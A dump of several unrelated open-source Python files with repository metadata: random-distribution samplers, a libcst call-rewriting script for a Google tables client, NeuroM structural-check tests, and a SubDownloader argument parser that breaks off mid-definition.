        # we use 1-random() instead of random() to preclude the
        # possibility of taking the log of zero.
        return -_log(1.0 - self.random())/lambd

    ## -------------------- von Mises distribution --------------------

    def vonmisesvariate(self, mu, kappa):
        """Circular data distribution.

        mu is the mean angle, expressed in radians between 0 and 2*pi, and
        kappa is the concentration parameter, which must be greater than or
        equal to zero. If kappa is equal to zero, this distribution reduces
        to a uniform random angle over the range 0 to 2*pi.
        """
        # mu:    mean angle (in radians between 0 and 2*pi)
        # kappa: concentration parameter kappa (>= 0)
        # if kappa = 0 generate uniform random angle

        # Based upon an algorithm published in: Fisher, N.I.,
        # "Statistical Analysis of Circular Data", Cambridge
        # University Press, 1993.

        # Thanks to Magnus Kessler for a correction to the
        # implementation of step 4.

        random = self.random
        if kappa <= 1e-6:
            return TWOPI * random()

        s = 0.5 / kappa
        r = s + _sqrt(1.0 + s * s)

        while 1:
            u1 = random()
            z = _cos(_pi * u1)

            d = z / (r + z)
            u2 = random()
            if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d):
                break

        q = 1.0 / r
        f = (q + z) / (1.0 + q * z)
        u3 = random()
        if u3 > 0.5:
            theta = (mu + _acos(f)) % TWOPI
        else:
            theta = (mu - _acos(f)) % TWOPI

        return theta

    ## -------------------- gamma distribution --------------------

    def gammavariate(self, alpha, beta):
        """Gamma distribution.  Not the gamma function!

        Conditions on the parameters are alpha > 0 and beta > 0.

        The probability distribution function is:

                    x ** (alpha - 1) * math.exp(-x / beta)
          pdf(x) =  --------------------------------------
                      math.gamma(alpha) * beta ** alpha
        """
        # alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2

        # Warning: a few older sources define the gamma distribution in terms
        # of alpha > -1.0

        # Fixed: the old-style "raise ValueError, msg" statement is Python-2-only
        # syntax; the call form below behaves identically and also parses on
        # Python 3.
        if alpha <= 0.0 or beta <= 0.0:
            raise ValueError('gammavariate: alpha and beta must be > 0.0')

        random = self.random
        if alpha > 1.0:

            # Uses R.C.H. Cheng, "The generation of Gamma
            # variables with non-integral shape parameters",
            # Applied Statistics, (1977), 26, No. 1, p71-74

            ainv = _sqrt(2.0 * alpha - 1.0)
            bbb = alpha - LOG4
            ccc = alpha + ainv

            while 1:
                u1 = random()
                if not 1e-7 < u1 < .9999999:
                    continue
                u2 = 1.0 - random()
                v = _log(u1/(1.0-u1))/ainv
                x = alpha*_exp(v)
                z = u1*u1*u2
                r = bbb+ccc*v-x
                if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
                    return x * beta

        elif alpha == 1.0:
            # expovariate(1)
            u = random()
            while u <= 1e-7:
                u = random()
            return -_log(u) * beta

        else:  # alpha is between 0 and 1 (exclusive)

            # Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle

            while 1:
                u = random()
                b = (_e + alpha)/_e
                p = b*u
                if p <= 1.0:
                    x = p ** (1.0/alpha)
                else:
                    x = -_log((b-p)/alpha)
                u1 = random()
                if p > 1.0:
                    if u1 <= x ** (alpha - 1.0):
                        break
                elif u1 <= _exp(-x):
                    break
            return x * beta

    ## -------------------- Gauss (faster alternative) --------------------

    def gauss(self, mu, sigma):
        """Gaussian distribution.

        mu is the mean, and sigma is the standard deviation. This is
        slightly faster than the normalvariate() function.

        Not thread-safe without a lock around calls.
        """
        # When x and y are two variables from [0, 1), uniformly
        # distributed, then
        #
        #    cos(2*pi*x)*sqrt(-2*log(1-y))
        #    sin(2*pi*x)*sqrt(-2*log(1-y))
        #
        # are two *independent* variables with normal distribution
        # (mu = 0, sigma = 1).
        # (Lambert Meertens)
        # (corrected version; bug discovered by Mike Miller, fixed by LM)

        # Multithreading note: When two threads call this function
        # simultaneously, it is possible that they will receive the
        # same return value. The window is very small though. To
        # avoid this, you have to use a lock around all calls. (I
        # didn't want to slow this down in the serial case by using a
        # lock here.)

        random = self.random
        z = self.gauss_next
        self.gauss_next = None
        if z is None:
            x2pi = random() * TWOPI
            g2rad = _sqrt(-2.0 * _log(1.0 - random()))
            z = _cos(x2pi) * g2rad
            self.gauss_next = _sin(x2pi) * g2rad

        return mu + z*sigma

    ## -------------------- beta --------------------
    ## See
    ## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
    ## for Ivan Frohne's insightful analysis of why the original implementation:
    ##
    ##    def betavariate(self, alpha, beta):
    ##        # Discrete Event Simulation in C, pp 87-88.
    ##
    ##        y = self.expovariate(alpha)
    ##        z = self.expovariate(1.0/beta)
    ##        return z/(y+z)
    ##
    ## was dead wrong, and how it probably got that way.

    def betavariate(self, alpha, beta):
        """Beta distribution.

        Conditions on the parameters are alpha > 0 and beta > 0.
        Returned values range between 0 and 1.
        """
        # This version due to Janne Sinkkonen, and matches all the std
        # texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
        y = self.gammavariate(alpha, 1.)
        if y == 0:
            return 0.0
        else:
            return y / (y + self.gammavariate(beta, 1.))

    ## -------------------- Pareto --------------------

    def paretovariate(self, alpha):
        """Pareto distribution.  alpha is the shape parameter."""
        # Jain, pg. 495

        u = 1.0 - self.random()
        return 1.0 / pow(u, 1.0/alpha)

    ## -------------------- Weibull --------------------

    def weibullvariate(self, alpha, beta):
        """Weibull distribution.

        alpha is the scale parameter and beta is the shape parameter.
        """
        # Jain, pg. 499; bug fix courtesy Bill Arms

        u = 1.0 - self.random()
        return alpha * pow(-_log(u), 1.0/beta)
# Create one instance, seeded by java, and export its methods
# as module-level functions. The functions share state across all uses
# (both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.
# (Note: gauss() in particular is documented as not thread-safe; use a
# private Random instance per thread when that matters.)

_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
getrandbits = _inst.getrandbits
|
kozec/SimplePython
|
src/random.py
|
Python
|
lgpl-3.0
| 15,856
|
[
"Gaussian"
] |
f7bba7a147d7719d3760fd4e2252e48c7383b960e5c67951f673cac318dff9bb
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import os
import libcst as cst
import pathlib
import sys
from typing import (Any, Callable, Dict, List, Sequence, Tuple)
def partition(
    predicate: Callable[[Any], bool],
    iterator: Sequence[Any]
) -> Tuple[List[Any], List[Any]]:
    """Split *iterator* into (matching, non-matching) lists, preserving order.

    A stable, out-of-place partition: the first list holds the items for
    which *predicate* is true, the second the items for which it is false.
    """
    matched: List[Any] = []
    unmatched: List[Any] = []
    for item in iterator:
        if predicate(item):
            matched.append(item)
        else:
            unmatched.append(item)
    # trueList, falseList -- same order as the caller expects.
    return matched, unmatched
class tablesCallTransformer(cst.CSTTransformer):
    """libcst transformer that rewrites flattened API calls into
    request-dict style calls (``client.m(a, b)`` -> ``client.m(request={...})``)."""

    # Keyword arguments that control the RPC itself rather than the request body.
    CTRL_PARAMS: Tuple[str] = ('retry', 'timeout', 'metadata')
    # Map of API method name -> ordered tuple of its flattened request fields;
    # the order must match the method's positional-parameter order.
    METHOD_TO_PARAMS: Dict[str, Tuple[str]] = {
        'batch_create_rows': ('parent', 'requests', ),
        'batch_delete_rows': ('parent', 'names', ),
        'batch_update_rows': ('parent', 'requests', ),
        'create_row': ('parent', 'row', 'view', ),
        'delete_row': ('name', ),
        'get_row': ('name', 'view', ),
        'get_table': ('name', ),
        'get_workspace': ('name', ),
        'list_rows': ('parent', 'page_size', 'page_token', 'view', 'filter', ),
        'list_tables': ('page_size', 'page_token', ),
        'list_workspaces': ('page_size', 'page_token', ),
        'update_row': ('row', 'update_mask', 'view', ),
    }

    def leave_Call(self, original: cst.Call, updated: cst.Call) -> cst.CSTNode:
        """Rewrite a single call node; return it unchanged when it is not a
        recognized API method or has already been converted."""
        try:
            key = original.func.attr.value
            kword_params = self.METHOD_TO_PARAMS[key]
        except (AttributeError, KeyError):
            # Either not a method from the API or too convoluted to be sure.
            return updated

        # If the existing code is valid, keyword args come after positional args.
        # Therefore, all positional args must map to the first parameters.
        args, kwargs = partition(lambda a: not bool(a.keyword), updated.args)
        if any(k.keyword.value == "request" for k in kwargs):
            # We've already fixed this file, don't fix it again.
            return updated

        # Separate request-body kwargs from RPC-control kwargs (retry/timeout/...).
        kwargs, ctrl_kwargs = partition(
            lambda a: a.keyword.value not in self.CTRL_PARAMS,
            kwargs
        )

        # Positional args beyond the known request fields must be control args.
        args, ctrl_args = args[:len(kword_params)], args[len(kword_params):]
        ctrl_kwargs.extend(cst.Arg(value=a.value, keyword=cst.Name(value=ctrl))
                           for a, ctrl in zip(ctrl_args, self.CTRL_PARAMS))

        request_arg = cst.Arg(
            value=cst.Dict([
                cst.DictElement(
                    cst.SimpleString("'{}'".format(name)),
                    cst.Element(value=arg.value)
                )
                # Note: the args + kwargs looks silly, but keep in mind that
                # the control parameters had to be stripped out, and that
                # those could have been passed positionally or by keyword.
                for name, arg in zip(kword_params, args + kwargs)]),
            keyword=cst.Name("request")
        )

        return updated.with_changes(
            args=[request_arg] + ctrl_kwargs
        )
def fix_files(
    in_dir: pathlib.Path,
    out_dir: pathlib.Path,
    *,
    transformer=None,
):
    """Duplicate the input dir to the output dir, fixing file method calls.

    Walks ``in_dir`` for ``.py`` files, rewrites flattened client method
    calls via a ``tablesCallTransformer``, and writes the results under
    ``out_dir`` with the same relative layout.

    Preconditions:
    * in_dir is a real directory
    * out_dir is a real, empty directory

    :param transformer: optional pre-built CST transformer; a fresh
        ``tablesCallTransformer`` is created when omitted.
    """
    # Fix: the old signature used "transformer=tablesCallTransformer()",
    # a call in a default argument -- the instance was built once at import
    # time and shared by every call. Use the None sentinel instead; callers
    # that pass their own transformer behave exactly as before.
    if transformer is None:
        transformer = tablesCallTransformer()

    pyfile_gen = (
        pathlib.Path(os.path.join(root, f))
        for root, _, files in os.walk(in_dir)
        for f in files if os.path.splitext(f)[1] == ".py"
    )

    for fpath in pyfile_gen:
        with open(fpath, 'r') as f:
            src = f.read()

        # Parse the code and insert method call fixes.
        tree = cst.parse_module(src)
        updated = tree.visit(transformer)

        # Create the path and directory structure for the new file.
        updated_path = out_dir.joinpath(fpath.relative_to(in_dir))
        updated_path.parent.mkdir(parents=True, exist_ok=True)

        # Generate the updated source file at the corresponding path.
        with open(updated_path, 'w') as f:
            f.write(updated.code)
if __name__ == '__main__':
    # Command-line entry point: validate the two directories, then delegate
    # the actual rewriting to fix_files().
    parser = argparse.ArgumentParser(
        description="""Fix up source that uses the tables client library.

The existing sources are NOT overwritten but are copied to output_dir with changes made.

Note: This tool operates at a best-effort level at converting positional
parameters in client method calls to keyword based parameters.
Cases where it WILL FAIL include
A) * or ** expansion in a method call.
B) Calls via function or method alias (includes free function calls)
C) Indirect or dispatched calls (e.g. the method is looked up dynamically)

These all constitute false negatives. The tool will also detect false
positives when an API method shares a name with another method.
""")
    parser.add_argument(
        '-d',
        '--input-directory',
        required=True,
        dest='input_dir',
        help='the input directory to walk for python files to fix up',
    )
    parser.add_argument(
        '-o',
        '--output-directory',
        required=True,
        dest='output_dir',
        help='the directory to output files fixed via un-flattening',
    )
    args = parser.parse_args()
    input_dir = pathlib.Path(args.input_dir)
    output_dir = pathlib.Path(args.output_dir)
    # Fail fast (exit -1) on any precondition violation; diagnostics go to
    # stderr so stdout stays clean for scripting.
    if not input_dir.is_dir():
        print(
            f"input directory '{input_dir}' does not exist or is not a directory",
            file=sys.stderr,
        )
        sys.exit(-1)

    if not output_dir.is_dir():
        print(
            f"output directory '{output_dir}' does not exist or is not a directory",
            file=sys.stderr,
        )
        sys.exit(-1)

    if os.listdir(output_dir):
        print(
            f"output directory '{output_dir}' is not empty",
            file=sys.stderr,
        )
        sys.exit(-1)

    fix_files(input_dir, output_dir)
|
googleapis/python-area120-tables
|
scripts/fixup_tables_v1alpha1_keywords.py
|
Python
|
apache-2.0
| 6,502
|
[
"VisIt"
] |
90ef4d67c093af05c37da78cfbf173e8a4f27049e54a6e0df9b6499446e8adea
|
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from pathlib import Path
from neurom import io
from neurom.check import structural_checks as chk
from nose import tools as nt
DATA_PATH = Path(__file__).parent.parent.parent.parent / 'test_data'
SWC_PATH = Path(DATA_PATH, 'swc')
H5V1_PATH = Path(DATA_PATH, 'h5/v1')
class TestIOCheckFST(object):
    """Structural checks (neurom.check.structural_checks) against known-good
    and known-bad SWC / HDF5-v1 morphology files.

    Fix: the class previously re-defined test_has_no_missing_parents_bad_data
    and test_has_sequential_ids_bad_data near the end with wrappers that
    called super() (the base is plain ``object``, so the call raised
    AttributeError), swallowed the error with a broad except and returned
    False. Those later definitions shadowed the real tests, silently
    disabling their assertions; they have been removed so the original
    tests run again.
    """

    def setup(self):
        # nose invokes this before every test method.
        self.load_data = io.load_data

    def test_has_sequential_ids_good_data(self):
        files = [Path(SWC_PATH, f)
                 for f in ['Neuron.swc',
                           'Single_apical_no_soma.swc',
                           'Single_apical.swc',
                           'Single_basal.swc',
                           'Single_axon.swc',
                           'Neuron_zero_radius.swc',
                           'sequential_trunk_off_0_16pt.swc',
                           'sequential_trunk_off_1_16pt.swc',
                           'sequential_trunk_off_42_16pt.swc',
                           'Neuron_no_missing_ids_no_zero_segs.swc']
                 ]

        for f in files:
            ok = chk.has_sequential_ids(self.load_data(f))
            nt.ok_(ok)
            nt.ok_(len(ok.info) == 0)

    def test_has_sequential_ids_bad_data(self):
        f = Path(SWC_PATH, 'Neuron_missing_ids.swc')
        ok = chk.has_sequential_ids(self.load_data(f))
        nt.ok_(not ok)
        nt.eq_(list(ok.info), [6, 217, 428, 639])

    def test_has_increasing_ids_good_data(self):
        files = [Path(SWC_PATH, f)
                 for f in ['Neuron.swc',
                           'Single_apical_no_soma.swc',
                           'Single_apical.swc',
                           'Single_basal.swc',
                           'Single_axon.swc',
                           'Neuron_zero_radius.swc',
                           'sequential_trunk_off_0_16pt.swc',
                           'sequential_trunk_off_1_16pt.swc',
                           'sequential_trunk_off_42_16pt.swc',
                           'Neuron_no_missing_ids_no_zero_segs.swc']
                 ]

        for f in files:
            ok = chk.has_increasing_ids(self.load_data(f))
            nt.ok_(ok)
            nt.ok_(len(ok.info) == 0)

    def test_has_increasing_ids_bad_data(self):
        f = Path(SWC_PATH, 'non_increasing_trunk_off_1_16pt.swc')
        ok = chk.has_increasing_ids(self.load_data(f))
        nt.ok_(not ok)
        nt.eq_(list(ok.info), [6, 12])

    def test_is_single_tree_bad_data(self):
        f = Path(SWC_PATH, 'Neuron_disconnected_components.swc')
        ok = chk.is_single_tree(self.load_data(f))
        nt.ok_(not ok)
        nt.eq_(list(ok.info), [6, 217, 428, 639])

    def test_is_single_tree_good_data(self):
        f = Path(SWC_PATH, 'Neuron.swc')
        ok = chk.is_single_tree(self.load_data(f))
        nt.ok_(ok)
        nt.eq_(len(ok.info), 0)

    def test_has_no_missing_parents_bad_data(self):
        f = Path(SWC_PATH, 'Neuron_missing_parents.swc')
        ok = chk.no_missing_parents(self.load_data(f))
        nt.ok_(not ok)
        nt.eq_(list(ok.info), [6, 217, 428, 639])

    def test_has_no_missing_parents_good_data(self):
        f = Path(SWC_PATH, 'Neuron.swc')
        ok = chk.no_missing_parents(self.load_data(f))
        nt.ok_(ok)
        nt.eq_(len(ok.info), 0)

    def test_has_soma_points_good_data(self):
        files = [Path(SWC_PATH, f)
                 for f in ['Neuron.swc',
                           'Single_apical.swc',
                           'Single_basal.swc',
                           'Single_axon.swc']]

        files.append(Path(H5V1_PATH, 'Neuron_2_branch.h5'))

        for f in files:
            nt.ok_(chk.has_soma_points(self.load_data(f)))

    def test_has_soma_points_bad_data(self):
        f = Path(SWC_PATH, 'Single_apical_no_soma.swc')
        nt.ok_(not chk.has_soma_points(self.load_data(f)))

    def test_has_valid_soma_good_data(self):
        dw = self.load_data(Path(SWC_PATH, 'Neuron.swc'))
        nt.ok_(chk.has_valid_soma(dw))

        dw = self.load_data(Path(H5V1_PATH, 'Neuron.h5'))
        nt.ok_(chk.has_valid_soma(dw))

    def test_has_valid_soma_bad_data(self):
        dw = self.load_data(Path(SWC_PATH, 'Single_apical_no_soma.swc'))
        nt.ok_(not chk.has_valid_soma(dw))

    def test_has_finite_radius_neurites_good_data(self):
        files = [Path(SWC_PATH, f)
                 for f in ['Neuron.swc',
                           'Single_apical.swc',
                           'Single_basal.swc',
                           'Single_axon.swc']]

        files.append(Path(H5V1_PATH, 'Neuron_2_branch.h5'))

        for f in files:
            ok = chk.has_all_finite_radius_neurites(self.load_data(f))
            nt.ok_(ok)
            nt.ok_(len(ok.info) == 0)

    def test_has_finite_radius_neurites_bad_data(self):
        f = Path(SWC_PATH, 'Neuron_zero_radius.swc')
        ok = chk.has_all_finite_radius_neurites(self.load_data(f))
        nt.ok_(not ok)
        nt.ok_(list(ok.info) == [194, 210, 246, 304, 493])

    def test_has_valid_neurites_good_data(self):
        dw = self.load_data(Path(SWC_PATH, 'Neuron.swc'))
        nt.ok_(chk.has_valid_neurites(dw))

        dw = self.load_data(Path(H5V1_PATH, 'Neuron.h5'))
        nt.ok_(chk.has_valid_neurites(dw))

    def test_has_valid_neurites_bad_data(self):
        dw = self.load_data(Path(SWC_PATH, 'Soma_origin.swc'))
        nt.ok_(not chk.has_valid_neurites(dw))
|
wizmer/NeuroM
|
neurom/check/tests/test_structural_checks.py
|
Python
|
bsd-3-clause
| 7,517
|
[
"NEURON"
] |
1b4d98ee0a35c3d3d32c815d5def2360040776f111d6e76fb8459e941ae39c74
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 SubDownloader Developers - See COPYING - GPLv3
import argparse
from collections import namedtuple
import logging
from pathlib import Path
from subdownloader import project
from subdownloader.client import ClientType
from subdownloader.client.cli import CliAction
from subdownloader.client.logger import LOGGING_LOGNOTHING
from subdownloader.client.state import ProviderData, SubtitleNamingStrategy
from subdownloader.languages.language import Language, NotALanguageException
def parse_arguments(args=None):
    """
    Parse the program arguments.

    :param args: optional list of argument strings (defaults to sys.argv)
    :return: ArgumentSettings object with the parsed arguments
    """
    parser = get_argument_parser()

    # Autocomplete arguments
    try:
        import argcomplete
        argcomplete.autocomplete(parser)
    except ImportError:
        # argcomplete is an optional dependency; shell completion is skipped.
        pass

    ns = parser.parse_args(args=args)

    # Derive the client type when not given explicitly: any CLI-only flag
    # forces CLI mode, otherwise default to the GUI. CLI-only flags combined
    # with an explicit GUI request are a usage error.
    if ns.client_type is None:
        if ns.console or ns.interactive or ns.list_languages:
            ns.client_type = ClientType.CLI
        else:
            ns.client_type = ClientType.GUI
    elif ns.client_type is ClientType.GUI:
        if ns.console or ns.interactive:
            parser.error(_('Invalid arguments for GUI mode'))

    video_path = ns.video_path
    if video_path:
        # Expand '~' in each user-supplied search path.
        video_path = list(p.expanduser() for p in video_path)

    return get_argument_options(
        client=ArgumentClientSettings(
            type=ns.client_type,
            cli=ArgumentClientCliSettings(
                console=ns.console,
                interactive=ns.interactive,
                list_languages=ns.list_languages,
            ),
            gui=ArgumentClientGuiSettings(
            ),
        ),
        log_path=ns.logfile,
        log_level=ns.loglevel,
        settings_path=ns.settings_path,
        search_recursive=ns.recursive,
        search_wd=video_path,
        filter_languages=ns.languages,
        naming_strategy=ns.naming_strategy,
        providers=ns.providers,
        test=ns.test,
    )
def get_argument_options(client,
                         log_path=None,
                         log_level=None,
                         settings_path=None,
                         search_recursive=None,
                         search_wd=None,
                         filter_languages=None,
                         naming_strategy=SubtitleNamingStrategy.VIDEO_LANG,
                         providers=None,
                         test=None,):
    """Bundle loose option values into a nested ArgumentSettings structure."""
    program_settings = ArgumentProgramSettings(
        log=ArgumentLogSettings(path=log_path, level=log_level),
        settings=ArgumentSettingsSettings(path=settings_path),
        client=client,
    )
    search_settings = ArgumentSearchSettings(
        recursive=search_recursive,
        working_directory=search_wd,
    )
    # None means "no language filter requested".
    filter_settings = FilterSettings(
        languages=None if filter_languages is None else filter_languages,
    )
    download_settings = DownloadSettings(naming_strategy=naming_strategy)
    return ArgumentSettings(
        program=program_settings,
        search=search_settings,
        filter=filter_settings,
        download=download_settings,
        providers=providers,
        test=test,
    )
# Immutable settings containers. The field names are part of the public
# interface and must stay in sync with get_argument_options()/parse_arguments().
ArgumentSettings = namedtuple(
    'ArgumentSettings',
    ['program', 'search', 'filter', 'download', 'providers', 'test'])
ArgumentProgramSettings = namedtuple(
    'ArgumentProgramSettings', ['log', 'settings', 'client'])
ArgumentLogSettings = namedtuple('ArgumentLogSettings', ['path', 'level'])
ArgumentSettingsSettings = namedtuple('ArgumentSettingsSettings', ['path'])
ArgumentClientSettings = namedtuple(
    'ArgumentClientSettings', ['type', 'cli', 'gui'])
ArgumentClientCliSettings = namedtuple(
    'ArgumentClientCliSettings', ['console', 'interactive', 'list_languages'])
# The GUI client currently carries no dedicated settings.
ArgumentClientGuiSettings = namedtuple('ArgumentClientGuiSettings', [])
ArgumentSearchSettings = namedtuple(
    'ArgumentSearchSettings', ['recursive', 'working_directory'])
FilterSettings = namedtuple('FilterSettings', ['languages'])
DownloadSettings = namedtuple('DownloadSettings', ['naming_strategy'])
class LanguagesAction(argparse.Action):
    """argparse action that converts raw language strings into Language objects.

    Each value may be a two/three-letter code, a locale or a full language
    name (Language.from_unknown tries all of them). Parsing aborts with a
    parser error on the first value that is not a known language.
    """
    def __call__(self, parser, namespace, values, option_string=None):
        try:
            languages = [Language.from_unknown(value, xx=True, xxx=True, locale=True, name=True) for value in values]
            setattr(namespace, self.dest, languages)
        except NotALanguageException as e:
            # parser.error() prints the message and exits the program.
            parser.error(_('{lang_str} is an unknown language.').format(lang_str=e.value))
class PathsAction(argparse.Action):
    """argparse action that normalizes path arguments.

    Every raw value becomes an absolute pathlib.Path with '~' expanded.
    """
    def __call__(self, parser, namespace, values, option_string=None):
        normalized = []
        for raw_value in values:
            normalized.append(Path(raw_value).expanduser().absolute())
        setattr(namespace, self.dest, normalized)
class ProviderAction(argparse.Action):
    """argparse action that collects provider configuration.

    Usage: ``--provider NAME [KEY1=VALUE1 [KEY2=VALUE2 ...]]``.
    The destination holds a dict mapping lower-cased provider name to
    ProviderData. Repeated occurrences for the same provider merge their
    key/value pairs; a duplicate key is a parse error.
    """
    def __call__(self, parser, namespace, values, option_string=None):
        providers = getattr(namespace, self.dest)
        if providers is None:
            # First --provider occurrence: create and attach the dict.
            providers = {}
            setattr(namespace, self.dest, providers)
        provider_str = values[0].lower()
        try:
            # Re-use keyword arguments from an earlier occurrence of the
            # same provider so options accumulate.
            kwargs = providers[provider_str].kwargs
        except KeyError:
            kwargs = {}
        for value in values[1:]:
            try:
                # Split on the first '=' only, so values may contain '='.
                k, v = value.split('=', 1)
                k, v = k.strip(), v.strip()
                if not k:
                    raise ValueError()
                if k in kwargs:
                    parser.error('Duplicate "{}"-provider key: {}'.format(provider_str, k))
                kwargs[k] = v
            except ValueError:
                parser.error('Illegal {} argument: {}'.format(option_string, value))
        providers[provider_str] = ProviderData(provider_str, kwargs)
def get_argument_parser():
    """
    Get a parser that is able to parse program arguments.

    The parser covers general options (version, videos, settings file,
    languages), interface selection (GUI/CLI), logging verbosity, CLI
    behavior (console/interactive/recursive, download vs. upload, subtitle
    naming strategy) and per-provider configuration.
    :return: instance of argparse.ArgumentParser
    """
    parser = argparse.ArgumentParser(description=project.get_description(),
                                     epilog=_('Visit us at {website}.').format(website=project.WEBSITE_MAIN))
    parser.add_argument('--version', action='version',
                        version='{project} {version}'.format(project=project.PROJECT_TITLE,
                                                             version=project.PROJECT_VERSION_STR))
    # Hidden flag (help suppressed) used by the test suite.
    parser.add_argument('-T', '--test', dest='test',
                        action='store_true', default=False,
                        help=argparse.SUPPRESS)
    parser.add_argument('-V', '--video', dest='video_path', default=None, metavar='PATH',
                        nargs=argparse.ZERO_OR_MORE, action=PathsAction,
                        help=_('Full path to your video(s).'))
    parser.add_argument('-s', '--settings', dest='settings_path', type=Path, default=None, metavar='FILE',
                        help=_('Set the settings file.'))
    parser.add_argument('-l', '--lang', dest='languages', metavar='LANGUAGE',
                        default=[],
                        nargs=argparse.ONE_OR_MORE, action=LanguagesAction,
                        help=_('Set the preferred subtitle language(s) for download and upload.'))
    # interface options
    interface_group = parser.add_argument_group(_('interface'), _('Change settings of the interface'))
    guicli = interface_group.add_mutually_exclusive_group()
    guicli.add_argument('-g', '--gui', dest='client_type',
                        action='store_const', const=ClientType.GUI,
                        help=_('Run application in GUI mode. This is the default.'))
    guicli.add_argument('-c', '--cli', dest='client_type',
                        action='store_const', const=ClientType.CLI,
                        help=_('Run application in CLI mode.'))
    # None means "not chosen"; parse_arguments() resolves the default later.
    parser.set_defaults(client_type=None)
    # logger options
    loggroup = parser.add_argument_group(_('logging'), _('Change the amount of logging done.'))
    loglvlex = loggroup.add_mutually_exclusive_group()
    loglvlex.add_argument('-d', '--debug', dest='loglevel',
                          action='store_const', const=logging.DEBUG,
                          help=_('Print log messages of debug severity and higher to stderr.'))
    loglvlex.add_argument('-w', '--warning', dest='loglevel',
                          action='store_const', const=logging.WARNING,
                          help=_('Print log messages of warning severity and higher to stderr. This is the default.'))
    loglvlex.add_argument('-e', '--error', dest='loglevel',
                          action='store_const', const=logging.ERROR,
                          help=_('Print log messages of error severity and higher to stderr.'))
    loglvlex.add_argument('-q', '--quiet', dest='loglevel',
                          action='store_const', const=LOGGING_LOGNOTHING,
                          help=_('Don\'t log anything to stderr.'))
    loggroup.set_defaults(loglevel=logging.WARNING)
    loggroup.add_argument('--log', dest='logfile', metavar='FILE', type=Path,
                          default=None, help=_('Path name of the log file.'))
    # cli options
    cli_group = parser.add_argument_group(_('cli'), _('Change the behavior of the command line interface.'))
    cli_group.add_argument('-C', '--console', dest='console',
                           action='store_true', default=False,
                           help=_('Start a console.'))
    cli_group.add_argument('-i', '--interactive', dest='interactive',
                           action='store_true', default=False,
                           help=_('Prompt user when decisions need to be done.'))
    cli_group.add_argument('-r', '--recursive', dest='recursive',
                           action='store_true', default=False,
                           help=_('Search for subtitles recursively.'))
    cli_group.add_argument('--list-languages', dest='list_languages',
                           action='store_true', default=False,
                           help=_('List available languages and quit.'))
    operation_group = cli_group.add_mutually_exclusive_group()
    operation_group.add_argument('-D', '--download', dest='operation', action='store_const', const=CliAction.DOWNLOAD,
                                 help=_('Download subtitle(s). This is the default.'))
    operation_group.add_argument('-U', '--upload', dest='operation', action='store_const', const=CliAction.UPLOAD,
                                 help=_('Upload subtitle(s).'))
    # operation_group.add_argument('-L', '--list', dest='operation', action='store_const', const=CliAction.LIST,
    #                              help=_('List available subtitle(s) without downloading.'))
    parser.set_defaults(operation=CliAction.DOWNLOAD)
    naming_group = cli_group.add_mutually_exclusive_group()
    naming_group.add_argument('--name-online', dest='naming_strategy', action='store_const',
                              const=SubtitleNamingStrategy.ONLINE,
                              help=_('Use the on-line subtitle filename as name for the downloaded subtitles.'))
    naming_group.add_argument('--name-video', dest='naming_strategy', action='store_const',
                              const=SubtitleNamingStrategy.VIDEO,
                              help=_('Use the local video filename as name for the downloaded subtitle.'))
    naming_group.add_argument('--name-lang', dest='naming_strategy', action='store_const',
                              const=SubtitleNamingStrategy.VIDEO_LANG,
                              help=_('Use the local video filename + language as name for the downloaded subtitle.')
                                   + ' ' + _('This is the default.'))
    naming_group.add_argument('--name-uploader', dest='naming_strategy', action='store_const',
